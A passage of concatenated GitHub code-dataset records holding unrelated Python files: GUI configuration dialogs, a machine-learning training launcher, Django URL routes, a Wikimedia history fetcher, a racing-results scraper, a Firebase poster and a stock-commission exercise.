base = os.path.abspath(os.path.dirname(__file__))\n self.SetIcon(wx.Icon(base+\"/icons/\"+IMG_ICON))\n \n self.UpdateData()\n\n self.Show()\n self.Layout()\n\n\n #--------------------- ---EVENT BIND--- #---------------------\n def filter_port(self):\n \"\"\"\n filter the Comports list from list UI supported Switch with same VID and PID.\n Args:\n No argument\n Return:\n port_name - list of availablable port numbers and serial number of \n the 2101 \n \"\"\"\n usb_hwid_str = [\"USB VID:PID=045E:0646\", \"USB VID:PID=2341:0042\"]\n comlist = serial.tools.list_ports.comports()\n port_name = []\n\n for port, desc, hwid in sorted(comlist):\n res = [True for gnhwid in usb_hwid_str if(gnhwid in hwid)]\n if(not res):\n port_name.append(port)\n return port_name\n \n \n def InitSelectionType(self):\n self.hboxdr6 = wx.BoxSizer(wx.HORIZONTAL)\n self.hboxdrn = wx.BoxSizer(wx.HORIZONTAL)\n\n bc = wx.StaticBox(self, -1, \"Settings\", size = (400, 200))\n self.vboxRead = wx.StaticBoxSizer(bc, wx.VERTICAL)\n self.rbtn_ser = wx.RadioButton(self, -1, label='Serial',style = wx.RB_GROUP )\n self.rbtn_tcp = wx.RadioButton(self, -1, label='Network(TCP)')\n self.btn_savetype = wx.Button(self, -1, label='Save', size= (65,25))\n \n self.ihboxdr6 = wx.BoxSizer(wx.HORIZONTAL)\n \n self.ihboxdr6.Add(self.rbtn_ser, flag=wx.LEFT, border=10)\n self.ihboxdr6.Add(self.rbtn_tcp, flag=wx.LEFT, border = 10)\n self.ihboxdr6.Add(self.btn_savetype, flag=wx.LEFT, border=30)\n \n self.hboxdr6.Add(self.ihboxdr6, flag=wx.ALIGN_CENTER_VERTICAL)\n\n self.st_nameSut = wx.StaticText(self, -1, \"Name of DUT\")\n self.tc_nameSut = wx.TextCtrl(self, -1, \" \", size = (135, 23))\n self.ihboxdrn = wx.BoxSizer(wx.HORIZONTAL)\n self.ihboxdrn.Add(self.st_nameSut, flag=wx.LEFT, border=10)\n self.ihboxdrn.Add(self.tc_nameSut, flag=wx.LEFT, border=10)\n self.hboxdrn.Add(self.ihboxdrn, flag=wx.ALIGN_CENTER_VERTICAL)\n\n self.vboxRead.AddMany([ \n (self.hboxdr6, 1, wx.EXPAND | wx.ALL, 5),\n (self.hboxdrn, 1, wx.EXPAND | wx.ALL, 5)\n ])\n\n self.btn_savetype.Bind(wx.EVT_BUTTON, self.SaveTypeName)\n\n self.rbtn_ser.Bind(wx.EVT_RADIOBUTTON, self.OnSerial)\n self.rbtn_tcp.Bind(wx.EVT_RADIOBUTTON, self.OnNetowrk)\n\n self.tc_nameSut.SetValue(self.dut[self.dut_key][\"name\"])\n\n\n def InitTcpConfig(self):\n ab = wx.StaticBox(self, -1, \"TCP Settings\", size = (400, 200))\n self.vboxTcp = wx.StaticBoxSizer(ab, wx.VERTICAL)\n self.st_tcp = wx.StaticText(self, -1, \"Will be implemented in future\", size = (180, 15))\n\n self.hboxtcp = wx.BoxSizer(wx.HORIZONTAL)\n\n self.hboxtcp.Add(self.st_tcp, flag=wx.LEFT, border=10)\n\n self.vboxTcp.AddMany([\n (self.hboxtcp, 1, wx.EXPAND | wx.ALL, 5),\n ])\n\n def InitSerialConfig(self):\n ab = wx.StaticBox(self, -1, \"COM Port Settings\", size = (400, 200))\n self.vboxSerial = wx.StaticBoxSizer(ab, wx.VERTICAL)\n self.cb_list = self.filter_port()\n cb_brate = [\"9600\", \"19200\", \"38400\", \"57600\", \"115200\"]\n cb_dbits = [\"5\",\"6\",\"7\",\"8\"]\n cb_sbits = [\"1\", \"1.5\", \"2\"]\n cb_parity = [\"Even\", \"Mark\", \"None\", \"Odd\", \"Space\"]\n cb_pechar = [\"(ignore)\", \"35 ('#')\", \"42 ('*')\", \"63 ('?')\"]\n\n self.hboxdrx = wx.BoxSizer(wx.HORIZONTAL)\n self.hboxdr2 = wx.BoxSizer(wx.HORIZONTAL)\n self.hboxdr3 = wx.BoxSizer(wx.HORIZONTAL)\n self.hboxdr4 = wx.BoxSizer(wx.HORIZONTAL)\n self.hboxdr5 = wx.BoxSizer(wx.HORIZONTAL)\n\n self.st_port = wx.StaticText(self, -1, \"Select Port \", size = (60, 15))\n self.cb_list = [\" \"]\n self.cb_switch = wx.ComboBox(self, -1, choices = self.cb_list, size = (65,-1))\n self.btn_ref = wx.Button(self, -1, \"Refresh\", (-1, -1))\n \n self.ihboxdr2 = wx.BoxSizer(wx.HORIZONTAL)\n self.ihboxdr2.Add(self.st_port, flag=wx.LEFT , border=0)\n self.ihboxdr2.Add(self.cb_switch, flag=wx.LEFT, border = 10)\n self.ihboxdr2.Add(self.btn_ref, flag=wx.LEFT, border = 30)\n\n self.hboxdr2.Add(self.ihboxdr2, flag=wx.LEFT | wx.ALIGN_CENTER_VERTICAL, border= 10)\n self.hboxdr2.Add(0,1,0)\n\n self.st_baud = wx.StaticText(self, -1, \"Baud Rate \", size = (60, 15))\n self.st_databits = wx.StaticText(self, -1, \"Data Bits\")\n \n self.cb_baud = wx.ComboBox(self,\n size=(65,-1),\n style = wx.TE_PROCESS_ENTER, choices=cb_brate)\n self.cb_Databits = wx.ComboBox(self,\n size=(65,-1),\n style = wx.TE_PROCESS_ENTER, choices = cb_dbits)\n\n self.ihboxdr3 = wx.BoxSizer(wx.HORIZONTAL)\n \n self.ihboxdr3.Add(self.st_baud, flag=wx.LEFT, border=10)\n self.ihboxdr3.Add(self.cb_baud, flag=wx.LEFT, border = 10)\n self.ihboxdr3.Add(self.st_databits, flag=wx.LEFT, border=30)\n self.ihboxdr3.Add(self.cb_Databits, flag=wx.LEFT, border = 10)\n self.hboxdr3.Add(self.ihboxdr3, flag=wx.ALIGN_CENTER_VERTICAL)\n \n self.ihboxdr4 = wx.BoxSizer(wx.HORIZONTAL)\n self.st_Parity = wx.StaticText(self, -1, \"Parity \", size = (60, 15))\n self.st_StopBits = wx.StaticText(self, -1, \"Stop Bits\")\n \n self.cb_Parity = wx.ComboBox(self,\n size=(65,-1),\n style = wx.TE_PROCESS_ENTER, choices=cb_parity)\n self.cb_StopBits = wx.ComboBox(self,\n size=(65,-1),\n style = wx.TE_PROCESS_ENTER, choices=cb_sbits)\n \n self.ihboxdr4.Add(self.st_Parity, flag=wx.LEFT, border=10)\n self.ihboxdr4.Add(self.cb_Parity, flag=wx.LEFT, border = 10)\n self.ihboxdr4.Add(self.st_StopBits, flag=wx.LEFT, border=30)\n self.ihboxdr4.Add(self.cb_StopBits, flag=wx.LEFT, border = 10)\n self.hboxdr4.Add(self.ihboxdr4, flag=wx.ALIGN_CENTER_VERTICAL)\n \n self.ihboxdrx = wx.BoxSizer(wx.HORIZONTAL)\n self.st_pechar = wx.StaticText(self, -1, \"Parity Error Char.\")\n self.cb_pechar = wx.ComboBox(self,\n size=(65,-1),\n style = wx.TE_PROCESS_ENTER, choices=cb_pechar)\n self.ihboxdrx.Add(self.st_pechar, flag=wx.LEFT, border=10)\n self.ihboxdrx.Add(self.cb_pechar, flag=wx.LEFT, border = 10)\n self.hboxdrx.Add(self.ihboxdrx, flag=wx.ALIGN_CENTER_VERTICAL)\n\n self.ihboxdr5 = wx.BoxSizer(wx.HORIZONTAL)\n self.btn_saveser = wx.Button(self, -1, \"Save\", size = (65, 25))\n self.ihboxdr5.Add(self.btn_saveser, flag=wx.LEFT, border = 140)\n self.hboxdr5.Add(self.ihboxdr5, flag=wx.ALIGN_CENTER_VERTICAL )\n\n self.vboxSerial.AddMany([\n (self.hboxdr2, 1, wx.EXPAND | wx.ALL, 5),\n (self.hboxdr3,1,wx.EXPAND | wx.ALL, 5),\n (self.hboxdr4,1,wx.EXPAND | wx.ALL, 5),\n (self.hboxdrx,1,wx.EXPAND | wx.ALL, 5),\n (self.hboxdr5,1,wx.EXPAND | wx.ALL, 5),\n ])\n\n self.InitSelectionCtrl()\n\n def InitDataToWatch(self):\n self.hboxdr7 = wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_ap = wx.BoxSizer(wx.HORIZONTAL)\n self.hboxdr8 = wx.BoxSizer(wx.HORIZONTAL)\n\n cb_action = [\"stop sequence\", \"count match\"]\n\n ca = wx.StaticBox(self, -1, \"Data to Watch\", size = (400, 200))\n self.vboxLog = wx.StaticBoxSizer(ca, wx.VERTICAL)\n\n self.ihboxdr7 = wx.BoxSizer(wx.HORIZONTAL) \n self.tc_data = wx.TextCtrl(self, 0, \"\", style = wx.TE_MULTILINE,\n size = (300,90)) \n self.hboxdr7.Add(self.tc_data, flag=wx.LEFT | \n wx.ALIGN_CENTER_VERTICAL, border=10) \n self.btn_savedtow = wx.Button(self, -1, \"Save\", size = (65, 25))\n self.hboxdr8.Add(self.btn_savedtow, flag=wx.LEFT | \n wx.ALIGN_CENTER_VERTICAL, border=120)\n\n self.st_action = wx.StaticText(self, -1, \"Match action\")\n self.cb_action = wx.ComboBox(self,\n size=(130,-1),\n style = wx.TE_PROCESS_ENTER, choices=cb_action)\n\n self.hbox_ap.Add(self.st_action, flag=wx.LEFT, border=10)\n self.hbox_ap.Add(self.cb_action, flag=wx.LEFT, border = 10)\n\n self.vboxLog.AddMany([\n (self.hboxdr7, 1, wx.EXPAND | wx.ALL),\n ((0,20), 0, wx.EXPAND),\n (self.hbox_ap, 1, wx.EXPAND | wx.ALL),\n (self.hboxdr8, 1, wx.EXPAND | wx.ALL)\n ])\n\n self.btn_savedtow.Bind(wx.EVT_BUTTON, self.SaveDataToWatch)\n\n faultList = None\n action = None\n try:\n faultList = self.dut[self.dut_key][\"faultseq\"]\n action = self.dut[self.dut_key][\"action\"]\n except:\n action = \"None\"\n\n self.cb_action.SetValue(action)\n\n faultstr = []\n for fault in faultList:\n faultstr.append(' \"'+fault+'\"')\n\n mystr = ','.join(map(str, faultstr))\n\n self.tc_data.SetValue(mystr)\n\n def InitSelectionCtrl(self):\n serkeys = list(self.dut_settings.keys())\n if(len(serkeys) == 0):\n self.dut_settings = self.dut[self.dut_key][\"default\"][\"serial\"]\n \n self.cb_switch.SetValue(self.dut_settings[\"port\"])\n self.cb_baud.SetValue(self.dut_settings[\"baud\"])\n self.cb_Parity.SetValue(self.dut_settings[\"parity\"])\n self.cb_Databits.SetValue(str(self.dut_settings[\"databits\"]))\n self.cb_pechar.SetValue(self.dut_settings[\"parerrcheck\"])\n self.cb_StopBits.SetValue(str(self.dut_settings[\"stopbits\"]))\n \n self.btn_ref.Bind(wx.EVT_BUTTON, self.RefreshConfig)\n self.btn_saveser.Bind(wx.EVT_BUTTON, self.SaveConfig)\n\n def SaveTypeName(self, event):\n type = \"tcp\"\n name = self.tc_nameSut.GetValue()\n if(self.rbtn_ser.GetValue()):\n type = \"serial\"\n\n self.dut[self.dut_key][\"name\"] = name\n self.dut[self.dut_key][\"interface\"] = type\n \n configdata.set_sut_base_data(self.dut)\n self.save_done_dialog(\"DUT name saved\")\n \n def SaveDataToWatch(self, event):\n fadata = self.tc_data.GetValue()\n fault_list = re.findall(r'\"([^\"]*)\"', fadata)\n\n action = self.cb_action.GetValue()\n \n findict = {self.dut_key : {\"faultseq\": fault_list, \"action\": action}}\n \n configdata.set_sut_watch_data(findict)\n self.top.updt_dut_config(findict)\n self.save_done_dialog(\"Data config saved\")\n\n def UpdateData(self):\n \n if(self.dut_type == \"serial\"):\n self.rbtn_ser.SetValue(True)\n self.vboxParent.Hide(self.vboxTcp)\n else:\n self.rbtn_tcp.SetValue(True)\n self.vboxParent.Hide(self.vboxSerial)\n \n def OnSerial(self, event):\n btn = event.GetEventObject()\n \n def OnNetowrk(self, event):\n btn = event.GetEventObject()\n\n def Onselectcom(self, e):\n self.cb = e.GetEventObject()\n\n def Onselectbaud(self, e):\n self.cb = e.GetEventObject()\n \n def Onselectdatabits(self, e):\n self.cb = e.GetEventObject()\n \n def Onselectstopbits(self, e):\n self.cb = e.GetEventObject()\n\n def SaveConfig(self, e):\n strcom = self.cb_switch.GetValue()\n strbr = self.cb_baud.GetValue()\n strdb = self.cb_Databits.GetValue()\n strpar = self.cb_Parity.GetValue()\n strsb = self.cb_StopBits.GetValue()\n strpec = self.cb_pechar.GetValue()\n\n dutconfig = {\"port\": strcom, \"baud\": strbr, \"databits\": strdb, \n \"parity\": strpar, \"stopbits\": strsb, \"parerrcheck\": strpec}\n\n findict = {self.dut_key : {\"serial\": dutconfig}}\n \n configdata.set_sut_config_data(findict)\n self.top.updt_dut_config(findict)\n\n self.save_done_dialog(\"Serial config saved\")\n \n def RefreshConfig(self, e):\n self.cb_list = self.filter_port()\n self.cb_switch.Clear()\n for cport in self.cb_list:\n self.cb_switch.Append(cport)\n self.cb_switch.SetSelection(0)\n\n def save_config_data(self, cdata):\n self.top.save_config_data(cdata)\n\n def read_config_data(self):\n return self.top.get_config_data()\n\n def save_done_dialog(self, msg):\n title = (\"DUT Config Dialog\")\n dlg = wx.MessageDialog(self, msg, title, wx.OK)\n dlg.ShowModal()","repo_name":"mcci-usb/Cricket","sub_path":"src/dutConfigDialog.py","file_name":"dutConfigDialog.py","file_ext":"py","file_size_in_byte":13982,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"39966302380","text":"import argparse\nimport os\nimport train\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--gpu', type=int, default=0, help='GPU to use [default: GPU 0]')\nparser.add_argument('--log_dir', default='log', help='Log dir [default: log]')\nparser.add_argument('--num_class', type=int, default=13, help='number of class')\nparser.add_argument('--num_point', type=int, default=4096, help='Point number [default: 4096]')\nparser.add_argument('--max_epoch', type=int, default=50, help='Epoch to run [default: 50]')\nparser.add_argument('--batch_size', type=int, default=15, help='Batch Size during training [default: 24]')\nparser.add_argument('--learning_rate', type=float, default=0.001, help='Initial learning rate [default: 0.001]')\nparser.add_argument('--momentum', type=float, default=0.9, help='Initial learning rate [default: 0.9]')\nparser.add_argument('--optimizer', default='adam', help='adam or momentum [default: adam]')\nparser.add_argument('--decay_step', type=int, default=300000, help='Decay step for lr decay [default: 300000]')\nparser.add_argument('--decay_rate', type=float, default=0.5, help='Decay rate for lr decay [default: 0.5]')\nparser.add_argument('--test_area', type=int, default=5, help='Which area to use for test, option: 1-6 [default: 5]')\nparser.add_argument('--data_path', type=str, default='../Data/S3DIS/train_dataset', help='data path')\nparser.add_argument('--roomlist_file', type=str, default='../Data/S3DIS/train_dataset/room_filelist.txt', help='The file which recorded the room name of each train data ')\nargs = parser.parse_args()\n\n\n#graph_inf contents parameters for grapg building and coarsing\ngraph_inf = {'stride_list': [4, 4, 4, 2], #can be seen as the downsampling rate\n 'radius_list': [0.1, 0.2, 0.4, 0.8, 1.6], # radius for neighbor points searching \n 'maxsample_list': [12, 21, 21, 21, 12] #number of neighbor points for each layer\n}\n\n# number of units for each mlp layer\nforward_parm = [\n [ [32,32,64], [64] ],\n [ [64,64,128], [128] ],\n [ [128,128,256], [256] ],\n [ [256,256,512], [512] ],\n [ [256,256], [256] ]\n]\n\n# for feature interpolation stage \nupsample_parm = [\n [128, 128],\n [128, 128],\n [256, 256],\n [256, 256]\n]\n\n# parameters for fully connection layer\nfullconect_parm = 128\n\nnet_inf = {'forward_parm': forward_parm,\n 'upsample_parm': upsample_parm,\n 'fullconect_parm': fullconect_parm\n}\n\n\nif not os.path.exists(args.log_dir): os.mkdir(args.log_dir)\nos.system('cp run.py %s' % (args.log_dir)) # back up parameter inf\nos.system('cp train.py %s' % (args.log_dir)) # back up parameter inf\nos.system('cp ../utils/pcnet_util.py %s' % (args.log_dir)) # back up parameter inf\nos.system('cp ../utils/model.py %s' % (args.log_dir)) # back up parameter inf\ntrain.train(args, graph_inf, net_inf)\n","repo_name":"wleigithub/GACNet","sub_path":"net_S3DIS/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"52"} +{"seq_id":"15541266384","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : evilbinary.org\n# E-mail : rootntsd@gmail.com\n# Date : 14/10/1 11:21:19\n# Desc : url定义\n\nfrom django.conf.urls import *\nfrom blog import views\nfrom django.conf import settings\nfrom blog.views import * \nfrom django.contrib import admin\nfrom feeds import ArticlesFeed,CommentsFeed\n\nurlpatterns= patterns('blog.views',\n url(r'^$','index'),\n url(r'^blog/','index'),\n url(r'^archive/(\\d{4})/(\\d{1,2})/$','archive'),\n url(r'^article/(\\d+)/$', 'article'),\n url(r'^articles/(\\d{4})/$', 'year_archive'),\n url(r'^articles/(\\d{4})/(\\d{2})/$','month_archive'),\n url(r'^articles/(\\d{4})/(\\d{2})/(\\d+)/$', 'article_detail'),\n url(r'^pages(?P\\d+)/$', 'pages'),\n url(r'^pages/$', 'pages'),\n url(r'^pages/(?P\\d+)/$', 'pages'),\n url(r'^page/(?P\\d+)$', 'page'),\n # url(r'^test(?P\\d+)/$', 'page'),\n url(r'^comment','comment'),\n url(r'^search/$','search'),\n url(r'^cat/(?P\\d+)$','cat'),\n url(r'^archives/(?P\\d+)/$','archives'),\n url(r'^archives$','archives'),\n url(r'^feeds/rss2$',ArticlesFeed()),\n url(r'^feeds/comments-rss2$',CommentsFeed()),\n url(r'^feeds/(?P\\S+)$','feed'),\n url(r'^test$','test'),\n url(r'^page_expir$','page_expir'),\n \n )\n","repo_name":"evilbinary/myblog","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"52"} +{"seq_id":"20701213624","text":"import traceback\n\nfrom qtpy.QtCore import Slot\nfrom qtpy.QtCore import Qt\nfrom qtpy.QtGui import QDoubleValidator\nfrom qtpy.QtWidgets import QDialog, QFileDialog\nfrom qtpy.QtWidgets import QMessageBox\nfrom qtpy.QtWidgets import QTableWidgetItem\nfrom qtpy.QtWidgets import QComboBox\n\nfrom nezzle.ui.ui_opennetworkdialog import Ui_OpenNetworkDialog\nfrom nezzle.io import read_metadata\nfrom nezzle.graphics.arrows.arrowclassfactory import ArrowClassFactory\n\n\nclass OpenNetworkDialog(QDialog, Ui_OpenNetworkDialog):\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n self.setupUi(self)\n\n self.setWindowTitle(\"Open a network file\")\n self.setWindowFlags(self.windowFlags() & ~Qt.WindowContextHelpButtonHint)\n\n validator_double = QDoubleValidator()\n validator_double.setBottom(0.0)\n\n # Set TableWidget for edge haader mapping\n self.ui_edgeHeadMappingTable.setColumnCount(3)\n self.ui_edgeHeadMappingTable.setHorizontalHeaderLabels([\"Count\", \"Interaction\", \"Head\"])\n\n # Set head selection QComboBox\n self._available_heads = ArrowClassFactory.get_available_heads()\n self._head_selections = {}\n\n # Edge signal and slot\n self.ui_openButton.released.connect(self.on_open_button_released)\n self.ui_reloadButton.released.connect(self.on_reload_button_released)\n self.ui_buttonBox.accepted.connect(self.on_accepted)\n self.ui_buttonBox.rejected.connect(self.on_rejected)\n\n # TODO: Implement tail mapping\n self.ui_edgeTailMappingTable.setColumnCount(3)\n self.ui_edgeTailMappingTable.setHorizontalHeaderLabels([\"Count\", \"Interaction\", \"Tail\"])\n self.ui_edgeTailMappingTable.setItem(0, 0, QTableWidgetItem(\"Currently Not Supported\"))\n\n self.ui_edgeTailMappingTable.setDisabled(True)\n\n @Slot()\n def on_open_button_released(self):\n try:\n dialog = QFileDialog(self)\n dialog.setWindowTitle(\"Open a network file\")\n dialog.setAcceptMode(QFileDialog.AcceptOpen)\n dialog.setNameFilters([self.tr(\"Text files (*.sif *.cx *.nzj *.json)\")])\n dialog.setFileMode(QFileDialog.ExistingFile)\n if dialog.exec() == QDialog.Accepted:\n fpath = dialog.selectedFiles()[0]\n self.ui_filePathEdit.setText(fpath)\n self.on_reload_button_released()\n # end of if\n except Exception as err:\n print(err)\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Critical)\n msg.setWindowTitle(\"Open a network file\")\n msg.setText(\"Invalid file type or file contents:\\n\\n%s\"%(traceback.format_exc()))\n msg.exec()\n # end of except\n\n @Slot()\n def on_reload_button_released(self):\n fpath = self.ui_filePathEdit.text()\n fpath = fpath.strip()\n\n if not fpath or len(fpath) <= 0:\n return\n\n self._head_selections.clear()\n metadata = read_metadata(fpath)\n interactions = metadata[\"INTERACTIONS\"]\n num_rows = len(interactions)\n self.ui_edgeHeadMappingTable.setRowCount(num_rows)\n for i, (interaction_name, count) in enumerate(interactions.items()):\n # Column (0): Count of each interaction\n count_item = QTableWidgetItem(str(count))\n count_item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n count_item.setFlags(count_item.flags() ^ Qt.ItemIsEditable)\n self.ui_edgeHeadMappingTable.setItem(i, 0, count_item)\n\n # Column (1): Interaction name\n interaction_item = QTableWidgetItem(interaction_name)\n interaction_item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n count_item.setFlags(count_item.flags() ^ Qt.ItemIsEditable)\n self.ui_edgeHeadMappingTable.setItem(i, 1, interaction_item)\n\n # Column (2): QComboBox for selecting heads\n cb = QComboBox()\n cb.addItems(self._available_heads)\n if interaction_name in self._available_heads:\n index = self._available_heads.index(interaction_name)\n cb.setCurrentIndex(index)\n\n self.ui_edgeHeadMappingTable.setCellWidget(i, 2, cb)\n self._head_selections[interaction_name] = cb\n # end of for\n\n self.ui_networkNameEdit.setText(metadata[\"NETWORK_NAME\"])\n\n @Slot()\n def on_accepted(self):\n self._fpath = self.ui_filePathEdit.text()\n self._network_name = self.ui_networkNameEdit.text().strip()\n super().accept()\n\n @Slot()\n def on_rejected(self):\n self.close()\n super().reject()\n\n # Read-only properties\n @property\n def edge_map(self):\n _edge_map = {}\n for interaction_name, cb in self._head_selections.items():\n _edge_map[interaction_name] = cb.currentText()\n return _edge_map\n\n @property\n def fpath(self):\n return self._fpath\n\n @property\n def network_name(self):\n return self._network_name\n\n # @property\n # def act_sym(self):\n # return self._act_sym\n #\n # @property\n # def inh_sym(self):\n # return self._inh_sym\n\n # @property\n # def scene_width(self):\n # return self._scene_width\n #\n # @property\n # def scene_height(self):\n # return self._scene_height\n\n @property\n def no_edge_type(self):\n return self.ui_noEdgeTypeCheck.isChecked()\n# end of class","repo_name":"dwgoon/nezzle","sub_path":"nezzle/dialogs/opennetworkdialog.py","file_name":"opennetworkdialog.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"43475299778","text":"# Includes TodayHistory class, which requests data from Wikimedia.\r\n# Instantiated in main.py and adds text regarding historic events\r\n# from this day in history.\r\n\r\nimport datetime\r\nimport requests\r\nfrom random import choice\r\nimport html\r\nfrom textwrap import fill\r\n\r\ntoday = datetime.datetime.now()\r\ndate = today.strftime(\"%m/%d\")\r\nformat_date = today.strftime(\"%A, %B %d, %Y\")\r\n\r\nurl = \"https://api.wikimedia.org/feed/v1/wikipedia/en/onthisday/all/\"\r\nheaders = {\r\n \"User-Agent\": \"anb.daily email (anb2015@gmail.com)\"\r\n}\r\n\r\nresponse = requests.get(url + date, headers=headers)\r\n\r\n\r\nclass TodayHistory:\r\n \"\"\"When instantiated and 'today' attribute added, returns a string\r\n which describes various events on this day in history as requested\r\n and filtered from wikimedia.org\"\"\"\r\n def __init__(self):\r\n self.data = response.json()\r\n self.today = \"- TODAY & ITS HISTORY -\\n\\n\"\r\n self.today += f\"Today is {format_date}.\\n\"\r\n self.get_date()\r\n self.get_birthday()\r\n self.get_holiday()\r\n\r\n def get_date(self):\r\n \"\"\"Adds to the attribute string 'today' germane information\r\n regarding today's place in the calendar.\"\"\"\r\n date_info = self.data[\"holidays\"][-1][\"pages\"][1]\r\n today_number = date_info[\"extract\"]\r\n today_number = fill(today_number, width=65)\r\n self.today += today_number\r\n self.today += \"\\n\\n\"\r\n\r\n def get_birthday(self):\r\n \"\"\"Adds to the attribute 'today' a randomly chosen person from Wikimedia\r\n list of people born today, with a short bio.\"\"\"\r\n birth_dict = choice(self.data[\"births\"])\r\n birth_person = birth_dict[\"pages\"][0][\"normalizedtitle\"]\r\n birth_year = birth_dict[\"year\"]\r\n birth_desc = birth_dict[\"pages\"][0][\"extract\"]\r\n birth_desc = fill(birth_desc, width=65)\r\n birth_desc = html.unescape(birth_desc)\r\n self.today += f\"{birth_person} was born on this day in {birth_year}:\\n\"\r\n self.today += birth_desc\r\n self.today += \"\\n\\n\"\r\n\r\n def get_holiday(self):\r\n \"\"\"Adds to the attribute 'today' information about a holiday observed today,\r\n as gathered from Wikimedia; chosen at random for longer list.\"\"\"\r\n holiday_dict = choice(self.data[\"holidays\"])\r\n holiday_name = holiday_dict[\"pages\"][0][\"normalizedtitle\"]\r\n holiday_desc = holiday_dict[\"pages\"][0][\"extract\"]\r\n holiday_desc = fill(holiday_desc, width=65)\r\n holiday_desc = html.unescape(holiday_desc)\r\n self.today += f\"Today {holiday_name} is recognized:\\n\"\r\n self.today += holiday_desc\r\n","repo_name":"andrewblais/anb-daily-email","sub_path":"1.0.2/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35720621664","text":"from parse_mgr import parseNote\r\nfrom lxml import etree\r\n\r\nclass RaceResult_Parse(parseNote.ParseBase):\r\n\r\n _tableLabel = 'f_tac table_bd draggable'\r\n\r\n def getUrl(self,race_date):\r\n url = 'https://racing.hkjc.com/racing/information/English/Racing/LocalResults.aspx?RaceDate={}'.format(race_date)\r\n return url\r\n\r\n def getOtherUrls(self,page_source):\r\n html = etree.HTML(page_source)\r\n _urlList = html.xpath('//table[@class=\"f_fs12 f_fr js_racecard\"]//td//a/@href')\r\n\r\n return _urlList[:-1]\r\n\r\n def parse_sole_info(self,page_source):\r\n try:\r\n html = etree.HTML(page_source)\r\n race_info = html.xpath('//div[@class=\"race_tab\"]//table')[0]\r\n date_info = html.xpath('//div[@class=\"raceMeeting_select\"]//p//span[@class=\"f_fl f_fs13\"]')[0]\r\n\r\n tempTitle = race_info.xpath('.//tr[@class=\"bg_blue color_w font_wb\"]//td')\r\n tempInfo = race_info.xpath('.//tbody[@class=\"f_fs13\"]//tr')\r\n\r\n raceInfoDict = dict()\r\n date_list = date_info.text.replace('Race Meeting:','').replace('\\xa0','').split(\" \")\r\n raceInfoDict['raceDate'] = date_list[1]\r\n raceInfoDict['raceSite'] = date_list[-2]+date_list[-1]\r\n _, raceInfoDict['raceNo'], raceInfoDict['raceId'] = tempTitle[0].text.replace('(','').replace(')','').split(\" \")\r\n\r\n #tr=0\r\n #tr=1\r\n tr1_list = tempInfo[1].xpath('.//td')\r\n track_list = tr1_list[0].text.split(\"M\")\r\n raceInfoDict['raceCls'],raceInfoDict['raceDistance'] = track_list[0].replace(' ','').split(\"-\")\r\n raceInfoDict['raceRate'] = ''\r\n if len(track_list)>1:\r\n raceInfoDict['raceRate'] = track_list[1].replace(')','').replace(' - (','')\r\n\r\n raceInfoDict['raceGo'] = tr1_list[2].text\r\n\r\n #tr=2\r\n tr2_list = tempInfo[2].xpath('.//td')\r\n raceInfoDict['raceName'] = tr2_list[0].text\r\n raceInfoDict['raceTrack'], raceInfoDict['raceCourse'] = tr2_list[2].text.replace(' ','').split(\"-\")\r\n\r\n #tr=3\r\n tr3_list = tempInfo[3].xpath('.//td')\r\n raceInfoDict['raceBonus'] = tr3_list[0].text.replace('HK$ ','').replace(',','')\r\n raceInfoDict['raceTotalTime'] = tr3_list[-1].text.replace('(','').replace(')','')\r\n\r\n #tr=4\r\n tr4_list = tempInfo[4].xpath('.//td')\r\n raceInfoDict['raceEndTime'] = tr4_list[-1].text.replace('(', '').replace(')', '')\r\n\r\n print(raceInfoDict)\r\n\r\n return raceInfoDict\r\n except IndexError:\r\n print('RaceResult_Parse: parse_sole_info error!')\r\n return\r\n","repo_name":"JudyPhy/spider","sub_path":"lulu_spider/parse_mgr/raceResult_parse.py","file_name":"raceResult_parse.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9521011590","text":"import json\n\nimport requests\n\nfrom domain.meldung import Meldung\n\n\nclass MeldungRepository:\n def __init__(self, link_to_firebase):\n self.link_to_firebase = link_to_firebase\n\n def post_meldung_to_firebase(self, meldungVar):\n requests.post(url=self.link_to_firebase, json=meldungVar.to_json())\n\n\nif __name__ == '__main__':\n # Testing\n repo = MeldungRepository('https://get-wasted-db-default-rtdb.firebaseio.com/Meldungen.json')\n meldung = Meldung(2, 2, 2, 2, 2, 6)\n repo.post_meldung_to_firebase(meldung)\n","repo_name":"jackie35er/getWastedAPI","sub_path":"persistance/meldung_repository.py","file_name":"meldung_repository.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39272812309","text":"#This program gives information regarding Joe's purchase of stock\n\n#Store the given information\nshares_purchased = 1000\ndollars_per_share = 32.87\ncommission = 0.02\nshares_sold = 1000\ndollars_per_share_sold = 33.92\n\n#The amount of money joe paid for the stock\npaid_for_stock = shares_purchased * dollars_per_share\nprint(f'Joe paid ${paid_for_stock} for his shares')\n#The amount of commission Joe paid his broker when he bought the stock\ncommision_for_stock = commission * paid_for_stock\nprint(f'Joe paid a commission of ${commision_for_stock}')\n#The amount Joe sold the stock for\namount_sold_for = shares_sold * dollars_per_share_sold\nprint(f'Joe sold his stock for ${amount_sold_for},')\n#The amount of commission Joe paid his broker when he sold the stock\ncommission_paid_2 = commission * amount_sold_for\n#Display the amount of money that Joe had left when he sold the stock and paid his broker (both times). If this amount is positice, then Joe made a profit. If the amount is negative, then Joe lost 